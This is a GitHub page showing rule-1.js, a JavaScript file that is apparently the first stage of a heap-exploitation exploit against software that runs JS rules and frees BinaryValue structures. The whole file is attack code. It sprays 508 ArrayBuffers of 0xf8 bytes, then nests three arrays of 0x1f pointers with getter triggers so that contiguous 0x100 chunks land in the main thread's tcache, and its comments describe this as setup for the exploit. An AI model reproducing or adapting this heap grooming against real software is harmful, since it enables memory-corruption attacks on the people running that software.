-
Notifications
You must be signed in to change notification settings - Fork 1
/
rule-1.js
49 lines (43 loc) · 1.44 KB
/
rule-1.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
/**
* RULE 1
* This rule will try and allocate 3 contiguous heap chunks of size 0x100, as
* 3 arrays of 0x1f BinaryValue pointers.
* They fit in the tcache, and as such, when the rule exits,
* BinaryValueFree() will free them and put them in the tcache of the main
* thread. This will give us the necessary heap setup for our exploit to
* succeed.
*/
BLOCK_SIZE = 0x100 - 0x8; // 0xf8
ARY_SIZE = BLOCK_SIZE / 8; // 0x1f
NB_BLOCKS = 508;
var blocks = new Array(NB_BLOCKS);
// Main array, contains everything we need
main = new Array(2).fill(0);
// Create a lot of BLOCK_SIZE ArrayBuffers (AB). They will go into the "messy"
// heap space and allow our next allocations to be contiguous (hopefully).
main[0] = {
get trigger() {
for(var i=0; i < NB_BLOCKS; i++) {
blocks[i] = new ArrayBuffer(BLOCK_SIZE);
}
return 'create_SIZE_blocks';
}
};
// Hopefully, the next three are contiguous.
// We create them like this because it makes less allocs than one-by-one.
// Less chances to mess up.
// The first element of the innermost array will put every array length to 0
// when evaluated. This avoid the allocation of BinaryValue (BV) structs (and
// other JS structs).
main[1] = new Array(ARY_SIZE);
main[1][0] = new Array(ARY_SIZE);
main[1][0][0] = new Array(ARY_SIZE);
main[1][0][0][0] = {
get trigger() {
main[1][0][0].length = 0;
main[1][0].length = 0;
main[1].length = 0;
}
};
// GO
main;